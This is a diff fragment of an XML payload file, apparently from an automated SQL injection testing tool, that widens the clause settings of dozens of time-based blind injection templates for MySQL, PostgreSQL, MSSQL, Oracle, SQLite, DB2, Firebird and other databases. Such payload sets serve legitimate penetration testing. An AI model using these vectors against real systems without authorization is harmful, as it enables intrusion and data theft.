<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request>
@ -681,7 +681,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
<request>
@ -703,7 +703,7 @@
<stype>5</stype>
<level>1</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request>
@ -722,7 +722,7 @@
<stype>5</stype>
<level>1</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request>
@ -741,7 +741,7 @@
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request>
@ -761,7 +761,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
<request>
@ -781,7 +781,7 @@
<stype>5</stype>
<level>2</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
<request>
@ -800,7 +800,7 @@
<stype>5</stype>
<level>2</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
<request>
@ -819,7 +819,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
<request>
@ -839,7 +839,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
<request>
@ -859,7 +859,7 @@
<stype>5</stype>
<level>3</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request>
@ -878,7 +878,7 @@
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request>
@ -897,7 +897,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request>
@ -917,7 +917,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request>
@ -937,7 +937,7 @@
<stype>5</stype>
<level>3</level>
<risk>2</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@ -957,7 +957,7 @@
<stype>5</stype>
<level>3</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@ -977,7 +977,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@ -998,7 +998,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request>
@ -1019,7 +1019,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request>
@ -1039,7 +1039,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request>
@ -1059,7 +1059,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request>
@ -1080,7 +1080,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1</clause>
<clause>1,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request>
@ -1101,7 +1101,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request>
@ -1120,7 +1120,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request>
@ -1139,7 +1139,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request>
@ -1159,7 +1159,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request>
@ -1179,7 +1179,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@ -1199,7 +1199,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@ -1219,7 +1219,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@ -1240,7 +1240,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@ -1261,7 +1261,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@ -1281,7 +1281,7 @@
<stype>5</stype>
<level>4</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@ -1301,7 +1301,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@ -1322,7 +1322,7 @@
<stype>5</stype>
<level>5</level>
<risk>3</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request>
@ -1390,7 +1390,7 @@
<stype>5</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
<request>
@ -1410,7 +1410,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request>
@ -1430,7 +1430,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request>
@ -1450,7 +1450,7 @@
<stype>5</stype>
<level>4</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>
<request>
@ -1469,7 +1469,7 @@
<stype>5</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@ -1488,7 +1488,7 @@
<stype>5</stype>
<level>5</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request>
@ -1507,7 +1507,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request>
@ -1527,7 +1527,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request>
@ -1546,7 +1546,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request>
@ -1567,7 +1567,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>
<request>
@ -1589,7 +1589,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
<request>
@ -1608,7 +1608,7 @@
<stype>5</stype>
<level>3</level>
<risk>1</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
<request>
@ -1627,7 +1627,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
<request>
@ -1646,7 +1646,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector>
<request>
@ -1666,7 +1666,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request>
@ -1686,7 +1686,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,3</clause>
<clause>1,3,9</clause>
<where>3</where>
<vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request>
@ -1705,7 +1705,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>3</where>
<vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request>
@ -1725,7 +1725,7 @@
<stype>5</stype>
<level>4</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
<request>
@ -1745,7 +1745,7 @@
<stype>5</stype>
<level>5</level>
<risk>2</risk>
<clause>1,2,3</clause>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
<request>